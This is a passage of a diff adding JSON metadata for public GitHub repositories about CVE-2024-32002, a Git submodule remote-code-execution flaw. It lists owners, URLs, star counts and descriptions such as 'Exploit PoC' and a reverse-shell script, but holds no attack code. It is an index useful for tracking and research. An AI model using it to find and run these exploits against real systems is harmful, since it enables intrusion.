+ "login": "markuta",
+ "id": 9108334,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9108334?v=4",
+ "html_url": "https:\/\/github.com\/markuta"
+ },
+ "html_url": "https:\/\/github.com\/markuta\/hooky",
+ "description": "A submodule for exploiting CVE-2024-32002 vulnerability.",
+ "fork": false,
+ "created_at": "2024-05-17T15:37:42Z",
+ "updated_at": "2024-05-17T17:00:30Z",
+ "pushed_at": "2024-05-17T17:00:15Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 802232037,
+ "name": "git_rce",
+ "full_name": "amalmurali47\/git_rce",
+ "owner": {
+ "login": "amalmurali47",
+ "id": 3582096,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3582096?v=4",
+ "html_url": "https:\/\/github.com\/amalmurali47"
+ },
+ "html_url": "https:\/\/github.com\/amalmurali47\/git_rce",
+ "description": "Exploit PoC for CVE-2024-32002",
+ "fork": false,
+ "created_at": "2024-05-17T19:33:08Z",
+ "updated_at": "2024-06-23T08:04:56Z",
+ "pushed_at": "2024-05-19T07:12:00Z",
+ "stargazers_count": 451,
+ "watchers_count": 451,
+ "has_discussions": false,
+ "forks_count": 126,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2024-32002",
+ "git",
+ "proof-of-concept",
+ "rce"
+ ],
+ "visibility": "public",
+ "forks": 126,
+ "watchers": 451,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 802232904,
+ "name": "hook",
+ "full_name": "amalmurali47\/hook",
+ "owner": {
+ "login": "amalmurali47",
+ "id": 3582096,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3582096?v=4",
+ "html_url": "https:\/\/github.com\/amalmurali47"
+ },
+ "html_url": "https:\/\/github.com\/amalmurali47\/hook",
+ "description": "Hook for the PoC for exploiting CVE-2024-32002",
+ "fork": false,
+ "created_at": "2024-05-17T19:35:44Z",
+ "updated_at": "2024-06-02T01:35:49Z",
+ "pushed_at": "2024-05-19T06:30:05Z",
+ "stargazers_count": 13,
+ "watchers_count": 13,
+ "has_discussions": false,
+ "forks_count": 24,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 24,
+ "watchers": 13,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 802333923,
+ "name": "CVE-2024-32002",
+ "full_name": "M507\/CVE-2024-32002",
+ "owner": {
+ "login": "M507",
+ "id": 38591075,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38591075?v=4",
+ "html_url": "https:\/\/github.com\/M507"
+ },
+ "html_url": "https:\/\/github.com\/M507\/CVE-2024-32002",
+ "description": "local poc for CVE-2024-32002",
+ "fork": false,
+ "created_at": "2024-05-18T02:42:33Z",
+ "updated_at": "2024-06-20T21:48:47Z",
+ "pushed_at": "2024-05-18T19:32:18Z",
+ "stargazers_count": 6,
+ "watchers_count": 6,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve",
+ "cve-2024-32002",
+ "git",
+ "proof-of-concept",
+ "rce",
+ "rce-exploit"
+ ],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 6,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 802464979,
+ "name": "cve-2024-32002-submodule-rce",
+ "full_name": "JakobTheDev\/cve-2024-32002-submodule-rce",
+ "owner": {
+ "login": "JakobTheDev",
+ "id": 21337744,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21337744?v=4",
+ "html_url": "https:\/\/github.com\/JakobTheDev"
+ },
+ "html_url": "https:\/\/github.com\/JakobTheDev\/cve-2024-32002-submodule-rce",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-05-18T11:20:31Z",
+ "updated_at": "2024-05-25T12:20:05Z",
+ "pushed_at": "2024-05-25T12:05:45Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 802465835,
+ "name": "cve-2024-32002-poc-rce",
+ "full_name": "JakobTheDev\/cve-2024-32002-poc-rce",
+ "owner": {
+ "login": "JakobTheDev",
+ "id": 21337744,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21337744?v=4",
+ "html_url": "https:\/\/github.com\/JakobTheDev"
+ },
+ "html_url": "https:\/\/github.com\/JakobTheDev\/cve-2024-32002-poc-rce",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-05-18T11:23:43Z",
+ "updated_at": "2024-05-25T12:19:50Z",
+ "pushed_at": "2024-05-25T12:18:27Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 802533707,
+ "name": "CVE-2024-32002",
+ "full_name": "safebuffer\/CVE-2024-32002",
+ "owner": {
+ "login": "safebuffer",
+ "id": 20618414,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20618414?v=4",
+ "html_url": "https:\/\/github.com\/safebuffer"
+ },
+ "html_url": "https:\/\/github.com\/safebuffer\/CVE-2024-32002",
+ "description": "CVE-2024-32002 RCE PoC",
+ "fork": false,
+ "created_at": "2024-05-18T15:05:28Z",
+ "updated_at": "2024-06-24T15:18:32Z",
+ "pushed_at": "2024-05-18T15:12:59Z",
+ "stargazers_count": 91,
+ "watchers_count": 91,
+ "has_discussions": false,
+ "forks_count": 22,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve",
+ "git",
+ "rce"
+ ],
+ "visibility": "public",
+ "forks": 22,
+ "watchers": 91,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 802725660,
+ "name": "CVE-2024-32002-POC",
+ "full_name": "10cks\/CVE-2024-32002-POC",
+ "owner": {
+ "login": "10cks",
+ "id": 47177550,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47177550?v=4",
+ "html_url": "https:\/\/github.com\/10cks"
+ },
+ "html_url": "https:\/\/github.com\/10cks\/CVE-2024-32002-POC",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-05-19T05:05:07Z",
+ "updated_at": "2024-05-19T05:05:10Z",
+ "pushed_at": "2024-05-19T05:05:07Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 802726337,
+ "name": "CVE-2024-32002-hulk",
+ "full_name": "10cks\/CVE-2024-32002-hulk",
+ "owner": {
+ "login": "10cks",
+ "id": 47177550,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47177550?v=4",
+ "html_url": "https:\/\/github.com\/10cks"
+ },
+ "html_url": "https:\/\/github.com\/10cks\/CVE-2024-32002-hulk",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-05-19T05:08:08Z",
+ "updated_at": "2024-05-19T05:29:27Z",
+ "pushed_at": "2024-05-19T05:29:24Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 802726386,
+ "name": "CVE-2024-32002-submod",
+ "full_name": "10cks\/CVE-2024-32002-submod",
+ "owner": {
+ "login": "10cks",
+ "id": 47177550,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47177550?v=4",
+ "html_url": "https:\/\/github.com\/10cks"
+ },
+ "html_url": "https:\/\/github.com\/10cks\/CVE-2024-32002-submod",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-05-19T05:08:22Z",
+ "updated_at": "2024-05-19T05:11:25Z",
+ "pushed_at": "2024-05-19T05:11:22Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 802726432,
+ "name": "CVE-2024-32002-smash",
+ "full_name": "10cks\/CVE-2024-32002-smash",
+ "owner": {
+ "login": "10cks",
+ "id": 47177550,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47177550?v=4",
+ "html_url": "https:\/\/github.com\/10cks"
+ },
+ "html_url": "https:\/\/github.com\/10cks\/CVE-2024-32002-smash",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-05-19T05:08:36Z",
+ "updated_at": "2024-05-19T05:08:36Z",
+ "pushed_at": "2024-05-19T05:08:36Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 802731173,
+ "name": "CVE-2024-32002-linux-hulk",
+ "full_name": "10cks\/CVE-2024-32002-linux-hulk",
+ "owner": {
+ "login": "10cks",
+ "id": 47177550,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47177550?v=4",
+ "html_url": "https:\/\/github.com\/10cks"
+ },
+ "html_url": "https:\/\/github.com\/10cks\/CVE-2024-32002-linux-hulk",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-05-19T05:31:41Z",
+ "updated_at": "2024-05-19T05:33:27Z",
+ "pushed_at": "2024-05-19T05:33:23Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 802731253,
+ "name": "CVE-2024-32002-linux-submod",
+ "full_name": "10cks\/CVE-2024-32002-linux-submod",
+ "owner": {
+ "login": "10cks",
+ "id": 47177550,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47177550?v=4",
+ "html_url": "https:\/\/github.com\/10cks"
+ },
+ "html_url": "https:\/\/github.com\/10cks\/CVE-2024-32002-linux-submod",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-05-19T05:32:08Z",
+ "updated_at": "2024-05-19T05:33:50Z",
+ "pushed_at": "2024-05-19T05:33:47Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 802731336,
+ "name": "CVE-2024-32002-linux-smash",
+ "full_name": "10cks\/CVE-2024-32002-linux-smash",
+ "owner": {
+ "login": "10cks",
+ "id": 47177550,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47177550?v=4",
+ "html_url": "https:\/\/github.com\/10cks"
+ },
+ "html_url": "https:\/\/github.com\/10cks\/CVE-2024-32002-linux-smash",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-05-19T05:32:34Z",
+ "updated_at": "2024-05-19T05:32:34Z",
+ "pushed_at": "2024-05-19T05:32:34Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 802930172,
+ "name": "poc_CVE-2024-32002",
+ "full_name": "aitorcastel\/poc_CVE-2024-32002",
+ "owner": {
+ "login": "aitorcastel",
+ "id": 28706936,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28706936?v=4",
+ "html_url": "https:\/\/github.com\/aitorcastel"
+ },
+ "html_url": "https:\/\/github.com\/aitorcastel\/poc_CVE-2024-32002",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-05-19T16:33:35Z",
+ "updated_at": "2024-05-19T16:34:58Z",
+ "pushed_at": "2024-05-19T16:34:55Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 802930338,
+ "name": "poc_CVE-2024-32002_submodule",
+ "full_name": "aitorcastel\/poc_CVE-2024-32002_submodule",
+ "owner": {
+ "login": "aitorcastel",
+ "id": 28706936,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28706936?v=4",
+ "html_url": "https:\/\/github.com\/aitorcastel"
+ },
+ "html_url": "https:\/\/github.com\/aitorcastel\/poc_CVE-2024-32002_submodule",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-05-19T16:34:11Z",
+ "updated_at": "2024-05-19T16:34:52Z",
+ "pushed_at": "2024-05-19T16:34:48Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 803075707,
+ "name": "hook",
+ "full_name": "10cks\/hook",
+ "owner": {
+ "login": "10cks",
+ "id": 47177550,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47177550?v=4",
+ "html_url": "https:\/\/github.com\/10cks"
+ },
+ "html_url": "https:\/\/github.com\/10cks\/hook",
+ "description": "CVE-2024-32002-hook",
+ "fork": false,
+ "created_at": "2024-05-20T02:44:07Z",
+ "updated_at": "2024-05-20T06:46:22Z",
+ "pushed_at": "2024-05-20T02:47:18Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 803077786,
+ "name": "CVE-2024-32002_HOOK",
+ "full_name": "jweny\/CVE-2024-32002_HOOK",
+ "owner": {
+ "login": "jweny",
+ "id": 26767398,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26767398?v=4",
+ "html_url": "https:\/\/github.com\/jweny"
+ },
+ "html_url": "https:\/\/github.com\/jweny\/CVE-2024-32002_HOOK",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-05-20T02:52:42Z",
+ "updated_at": "2024-05-22T18:10:22Z",
+ "pushed_at": "2024-05-20T03:12:00Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 803079258,
+ "name": "CVE-2024-32002_EXP",
+ "full_name": "jweny\/CVE-2024-32002_EXP",
+ "owner": {
+ "login": "jweny",
+ "id": 26767398,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26767398?v=4",
+ "html_url": "https:\/\/github.com\/jweny"
+ },
+ "html_url": "https:\/\/github.com\/jweny\/CVE-2024-32002_EXP",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-05-20T02:58:57Z",
+ "updated_at": "2024-06-03T15:35:41Z",
+ "pushed_at": "2024-05-20T07:26:49Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 803132723,
+ "name": "CVE-2024-32002_EXP",
+ "full_name": "CrackerCat\/CVE-2024-32002_EXP",
+ "owner": {
+ "login": "CrackerCat",
+ "id": 17995064,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17995064?v=4",
+ "html_url": "https:\/\/github.com\/CrackerCat"
+ },
+ "html_url": "https:\/\/github.com\/CrackerCat\/CVE-2024-32002_EXP",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-05-20T06:12:02Z",
+ "updated_at": "2024-05-20T08:13:06Z",
+ "pushed_at": "2024-05-20T03:17:39Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 803223744,
+ "name": "CVE-2024-32002",
+ "full_name": "KiranKumarK20\/CVE-2024-32002",
+ "owner": {
+ "login": "KiranKumarK20",
+ "id": 103519544,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/103519544?v=4",
+ "html_url": "https:\/\/github.com\/KiranKumarK20"
+ },
+ "html_url": "https:\/\/github.com\/KiranKumarK20\/CVE-2024-32002",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-05-20T10:07:51Z",
+ "updated_at": "2024-05-20T10:07:51Z",
+ "pushed_at": "2024-05-20T10:07:51Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 803811564,
+ "name": "hook",
+ "full_name": "Roronoawjd\/hook",
+ "owner": {
+ "login": "Roronoawjd",
+ "id": 105417063,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/105417063?v=4",
+ "html_url": "https:\/\/github.com\/Roronoawjd"
+ },
+ "html_url": "https:\/\/github.com\/Roronoawjd\/hook",
+ "description": "CVE-2024-32002 hook POC",
+ "fork": false,
+ "created_at": "2024-05-21T12:31:57Z",
+ "updated_at": "2024-05-21T12:36:15Z",
+ "pushed_at": "2024-05-21T12:36:12Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 803835949,
+ "name": "git_rce",
+ "full_name": "Roronoawjd\/git_rce",
+ "owner": {
+ "login": "Roronoawjd",
+ "id": 105417063,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/105417063?v=4",
+ "html_url": "https:\/\/github.com\/Roronoawjd"
+ },
+ "html_url": "https:\/\/github.com\/Roronoawjd\/git_rce",
+ "description": "CVE-2024-32002 POC",
+ "fork": false,
+ "created_at": "2024-05-21T13:19:15Z",
+ "updated_at": "2024-05-23T11:24:50Z",
+ "pushed_at": "2024-05-23T11:24:47Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 803851228,
+ "name": "CVE-2024-32002-Reverse-Shell",
+ "full_name": "JJoosh\/CVE-2024-32002-Reverse-Shell",
+ "owner": {
+ "login": "JJoosh",
+ "id": 122099216,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/122099216?v=4",
+ "html_url": "https:\/\/github.com\/JJoosh"
+ },
+ "html_url": "https:\/\/github.com\/JJoosh\/CVE-2024-32002-Reverse-Shell",
+ "description": "Este script demuestra cómo explotar la vulnerabilidad CVE-2024-32002 para obtener una reverse shell, proporcionando acceso remoto al sistema afectado. Úselo con precaución en entornos controlados y solo con fines educativos o de pruebas de seguridad.",
+ "fork": false,
+ "created_at": "2024-05-21T13:45:58Z",
+ "updated_at": "2024-05-23T15:14:13Z",
+ "pushed_at": "2024-05-21T14:01:26Z",
+ "stargazers_count": 6,
+ "watchers_count": 6,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 6,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 804135331,
+ "name": "CVE-2024-32002-poc",
+ "full_name": "YuanlooSec\/CVE-2024-32002-poc",
+ "owner": {
+ "login": "YuanlooSec",
+ "id": 133356276,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/133356276?v=4",
+ "html_url": "https:\/\/github.com\/YuanlooSec"
+ },
+ "html_url": "https:\/\/github.com\/YuanlooSec\/CVE-2024-32002-poc",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-05-22T02:51:36Z",
+ "updated_at": "2024-05-22T06:48:17Z",
+ "pushed_at": "2024-05-22T06:48:14Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 804285979,
+ "name": "CVE-2024-32002-poc",
+ "full_name": "1mxml\/CVE-2024-32002-poc",
+ "owner": {
+ "login": "1mxml",
+ "id": 94277520,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/94277520?v=4",
+ "html_url": "https:\/\/github.com\/1mxml"
+ },
+ "html_url": "https:\/\/github.com\/1mxml\/CVE-2024-32002-poc",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-05-22T10:01:58Z",
+ "updated_at": "2024-05-22T10:02:02Z",
+ "pushed_at": "2024-05-22T10:01:58Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 804311936,
+ "name": "CVE-2024-32002-hook",
+ "full_name": "bfengj\/CVE-2024-32002-hook",
+ "owner": {
+ "login": "bfengj",
+ "id": 63182771,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63182771?v=4",
+ "html_url": "https:\/\/github.com\/bfengj"
+ },
+ "html_url": "https:\/\/github.com\/bfengj\/CVE-2024-32002-hook",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-05-22T11:05:48Z",
+ "updated_at": "2024-05-22T11:07:24Z",
+ "pushed_at": "2024-05-22T11:07:21Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 804320454,
+ "name": "CVE-2024-32002-hulk",
+ "full_name": "ycdxsb\/CVE-2024-32002-hulk",
+ "owner": {
+ "login": "ycdxsb",
+ "id": 32149596,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32149596?v=4",
+ "html_url": "https:\/\/github.com\/ycdxsb"
+ },
+ "html_url": "https:\/\/github.com\/ycdxsb\/CVE-2024-32002-hulk",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-05-22T11:26:30Z",
+ "updated_at": "2024-05-22T11:32:40Z",
+ "pushed_at": "2024-05-22T11:32:37Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 804320768,
+ "name": "CVE-2024-32002-submod",
+ "full_name": "ycdxsb\/CVE-2024-32002-submod",
+ "owner": {
+ "login": "ycdxsb",
+ "id": 32149596,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32149596?v=4",
+ "html_url": "https:\/\/github.com\/ycdxsb"
+ },
+ "html_url": "https:\/\/github.com\/ycdxsb\/CVE-2024-32002-submod",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-05-22T11:27:14Z",
+ "updated_at": "2024-05-22T11:32:58Z",
+ "pushed_at": "2024-05-22T11:32:54Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 804323007,
+ "name": "CVE-2024-32002-Exploit",
+ "full_name": "bfengj\/CVE-2024-32002-Exploit",
+ "owner": {
+ "login": "bfengj",
+ "id": 63182771,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63182771?v=4",
+ "html_url": "https:\/\/github.com\/bfengj"
+ },
+ "html_url": "https:\/\/github.com\/bfengj\/CVE-2024-32002-Exploit",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-05-22T11:32:33Z",
+ "updated_at": "2024-05-29T01:55:16Z",
+ "pushed_at": "2024-05-22T11:39:37Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 804435009,
+ "name": "cve-2024-32002-1",
+ "full_name": "Hector65432\/cve-2024-32002-1",
+ "owner": {
+ "login": "Hector65432",
+ "id": 170522196,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/170522196?v=4",
+ "html_url": "https:\/\/github.com\/Hector65432"
+ },
+ "html_url": "https:\/\/github.com\/Hector65432\/cve-2024-32002-1",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-05-22T15:24:19Z",
+ "updated_at": "2024-05-22T15:24:19Z",
+ "pushed_at": "2024-05-21T02:03:25Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 804435195,
+ "name": "cve-2024-32002-2",
+ "full_name": "Hector65432\/cve-2024-32002-2",
+ "owner": {
+ "login": "Hector65432",
+ "id": 170522196,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/170522196?v=4",
+ "html_url": "https:\/\/github.com\/Hector65432"
+ },
+ "html_url": "https:\/\/github.com\/Hector65432\/cve-2024-32002-2",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-05-22T15:24:46Z",
+ "updated_at": "2024-05-22T15:24:46Z",
+ "pushed_at": "2024-05-21T02:03:42Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 804523151,
+ "name": "CVE-2024-32002",
+ "full_name": "vincepsh\/CVE-2024-32002",
+ "owner": {
+ "login": "vincepsh",
+ "id": 60623403,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60623403?v=4",
+ "html_url": "https:\/\/github.com\/vincepsh"
+ },
+ "html_url": "https:\/\/github.com\/vincepsh\/CVE-2024-32002",
